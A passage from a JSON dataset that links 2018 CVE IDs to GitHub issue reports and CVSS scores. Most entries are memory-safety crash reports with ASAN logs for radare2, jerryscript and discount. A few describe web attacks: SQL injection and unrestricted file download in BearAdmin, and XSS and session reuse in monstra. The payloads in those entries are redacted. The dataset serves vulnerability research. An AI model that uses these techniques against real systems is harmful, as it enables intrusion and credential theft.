        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9928",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-19T12:52:01Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic (binary file) | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) |radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG dfca commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11376",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9904",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9904",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-16T19:06:05Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run `r2 A r2_hoobr_r_read_le NUMBERTAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11377",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9901",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9901",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-16T12:30:04Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11378",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9969",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9969",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-27T11:06:14Z",
        "description": "Stack buffer overflow in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Binary (generic) | Architecture/bits of the file (mandatory) | WASM | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f commit: APITAG build NUMBERTAG Expected behavior Dissasembly of file or error message. Actual behavior Stack buffer overflow in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11379",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9926",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9926",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-19T08:52:37Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) |radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG dfca commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11380",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9970",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9970",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-27T11:08:26Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Mach O | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f commit: APITAG build NUMBERTAG Expected behavior Dissasembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11381",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9902",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9902",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-16T12:33:32Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic | Architecture/bits of the file (mandatory) | None APITAG file) | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11382",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10091",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10091",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-05-14T12:44:21Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Binary | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG d2b NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11383",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9943",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9943",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-23T10:56:15Z",
        "description": "Invalid free in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g4f NUMBERTAG f9c commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Invaild free and program crash. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... Backtrace & error message: ERRORTAG Extract from Valgrind log: CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11384",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9903",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9903",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-16T12:39:10Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11403",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/63",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/63",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-05-23T12:35:54Z",
        "description": "There is two cross site scripting vulnerability. Two xss vulnerability was discovered in domainmod NUMBERTAG There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-11413",
        "Issue_Url_old": "https://github.com/yupoxiong/BearAdmin/issues/5",
        "Issue_Url_new": "https://github.com/yupoxiong/bearadmin/issues/5",
        "Repo_new": "yupoxiong/bearadmin",
        "Issue_Created_At": "2018-05-24T13:00:27Z",
        "description": "There is two vulnerability SQL INJECTION AND AN DOWNLOAD FILES WITHOUT LIMIT. FILETAG INJECTION In the controller file PATHTAG in the function index code line NUMBERTAG CODETAG the parameter named user_id without any APITAG just bring into the MYSQL query. After use the demo account demo demo login in your app, and then using the payload PATHTAG APITAG we can get the version of your MYSQL . that's the testing on your demo website. FILETAG NUMBERTAG download files without any limit in the file PATHTAG In the function __construct ,line NUMBERTAG ERRORTAG from the code we know that the parameter \"name \" is from the GET method.and without any limit let's take a look at the code line NUMBERTAG ERRORTAG $this >back is defined in the file PATHTAG line NUMBERTAG ERRORTAG the dowloadfile function haven't any filters. So i deploy the apps on local,after login we try the poc url PATHTAG FILETAG We can read the config file of mysql account and the password",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11416",
        "Issue_Url_old": "https://github.com/tjko/jpegoptim/issues/57",
        "Issue_Url_new": "https://github.com/tjko/jpegoptim/issues/57",
        "Repo_new": "tjko/jpegoptim",
        "Issue_Created_At": "2018-04-17T01:52:30Z",
        "description": "Double free in jpegoptim. I have come across a double free in jpegoptim. Please see the ASAN report below. The crash file test case can be found FILETAG . This was found in commit APITAG The command to compile the binary is as follows: ERRORTAG This double free could be used to assist in exploiting the software via heap manipulation resulting in code execution. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11418",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2237",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2237",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2018-03-08T07:44:13Z",
        "description": "heap buffer overflow in lit_read_code_unit_from_utf8. (new APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG f at pc NUMBERTAG ff NUMBERTAG bp NUMBERTAG ffe3dc NUMBERTAG sp NUMBERTAG ffe3dc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG f thread T NUMBERTAG ff NUMBERTAG in lit_read_code_unit_from_utf8 PATHTAG NUMBERTAG ff NUMBERTAG in lit_utf8_peek_next PATHTAG NUMBERTAG e0c0 in re_parse_char_class PATHTAG NUMBERTAG a7b5 in re_parse_alternative PATHTAG NUMBERTAG b5f7 in re_compile_bytecode PATHTAG NUMBERTAG e NUMBERTAG in ecma_op_create_regexp_object PATHTAG NUMBERTAG bf NUMBERTAG b in APITAG PATHTAG NUMBERTAG a0e9d in APITAG PATHTAG NUMBERTAG b3 in opfunc_construct PATHTAG NUMBERTAG b3 in vm_execute PATHTAG NUMBERTAG a0d in vm_run PATHTAG NUMBERTAG a0d in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ea NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG f8e9 ( PATHTAG NUMBERTAG f NUMBERTAG f is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG f) allocated by thread T0 here NUMBERTAG f7a1edee in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_alloc_block PATHTAG NUMBERTAG aa in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG a in parser_compute_indicies PATHTAG NUMBERTAG a in parser_post_processing PATHTAG NUMBERTAG f8a in parser_parse_source PATHTAG NUMBERTAG c NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ea NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_utf8 Shadow bytes around the buggy address NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG ec NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11419",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2230",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2230",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2018-03-01T06:28:57Z",
        "description": "heap buffer overflow in lit_read_code_unit_from_hex. samiliar bug with NUMBERTAG new APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG c at pc NUMBERTAG f9f5a bp NUMBERTAG ffdf2a NUMBERTAG sp NUMBERTAG ffdf2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG c thread T NUMBERTAG f9f NUMBERTAG in lit_read_code_unit_from_hex PATHTAG NUMBERTAG df NUMBERTAG in re_parse_char_class PATHTAG NUMBERTAG a7b5 in re_parse_alternative PATHTAG NUMBERTAG b5f7 in re_compile_bytecode PATHTAG NUMBERTAG e NUMBERTAG in ecma_op_create_regexp_object PATHTAG NUMBERTAG bf NUMBERTAG b in APITAG PATHTAG NUMBERTAG a0e9d in APITAG PATHTAG NUMBERTAG b3 in opfunc_construct PATHTAG NUMBERTAG b3 in vm_execute PATHTAG NUMBERTAG a0d in vm_run PATHTAG NUMBERTAG a0d in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG f8e9 ( PATHTAG NUMBERTAG f NUMBERTAG c is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG c) allocated by thread T0 here NUMBERTAG f NUMBERTAG dee in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_alloc_block PATHTAG NUMBERTAG aa in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG a in parser_compute_indicies PATHTAG NUMBERTAG a in parser_post_processing PATHTAG NUMBERTAG f8a in parser_parse_source PATHTAG NUMBERTAG c NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_hex Shadow bytes around the buggy address NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG eb NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11440",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/575",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/575",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-05-25T10:12:07Z",
        "description": "ASAn stack based buffer overflow in APITAG APITAG FILETAG Tested version NUMBERTAG and commit APITAG Might be related to: CVETAG Credit: Henri Salo ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11468",
        "Issue_Url_old": "https://github.com/Orc/discount/issues/189",
        "Issue_Url_new": "https://github.com/orc/discount/issues/189",
        "Repo_new": "orc/discount",
        "Issue_Created_At": "2018-05-23T09:44:58Z",
        "description": "Several heap buffer overflow issues have been found.. A buffer overflow has been discovered. The information is displayed as follows: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG a NUMBERTAG a at pc NUMBERTAG f7e7a5e7df8 bp NUMBERTAG ffe NUMBERTAG efa NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ef1f8 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG a NUMBERTAG a thread T NUMBERTAG f7e7a5e7df7 in __asan_memmove ( PATHTAG NUMBERTAG b NUMBERTAG in memmove PATHTAG NUMBERTAG b NUMBERTAG in __mkd_trim_line PATHTAG NUMBERTAG e0 in codeblock PATHTAG NUMBERTAG e0 in compile PATHTAG NUMBERTAG a NUMBERTAG e in compile_document PATHTAG NUMBERTAG a NUMBERTAG e in mkd_compile PATHTAG NUMBERTAG c in main PATHTAG NUMBERTAG f7e7a1b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f7e7a5f NUMBERTAG in malloc ( PATHTAG NUMBERTAG e NUMBERTAG d in splitline PATHTAG NUMBERTAG e NUMBERTAG d in htmlblock PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memmove Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The input test case is at: URLTAG The executable file is mkd2html.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11472",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/445",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/445",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-05-22T19:58:56Z",
        "description": "Reflected XSS in Login. Reflected XSS in Login Below is the post request and the screenshot attached POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG login=\"> APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11473",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/446",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/446",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-05-22T20:21:21Z",
        "description": "XSS in registration Form. XSS in registration Form Below is the post request that is causing the pop up..here all the fields are vulnerable POST PATHTAG HTTP NUMBERTAG Host: localhost Cache Control: no cache Referer: URLTAG Accept: PATHTAG / ;q NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept Language: en us,en;q NUMBERTAG Cookie: PHPSESSID=xxxx; login_attempts=i NUMBERTAG A NUMBERTAG B Accept Encoding: gzip, deflate Content Length NUMBERTAG Content Type: application/x www form urlencoded APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11474",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/444",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/444",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-05-22T19:38:13Z",
        "description": "Session Management Issue in Administrations Tab. Session Management Issue in Administrations Tab link: URLTAG You need two browsers for exploitation NUMBERTAG Go to users settings in both the browsers NUMBERTAG update your password in one browser and click on save APITAG move to other browser and try to add some information like name and all. i.e it is not asking for reauthentication after password change.. The other browser doesnt log you out because of password APITAG an attacker can edit any information... If an attacker had already logged in once..No matter how many times the victim changes his password, the attacker would be able to access the victim's account. Refer to owasp for session management",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
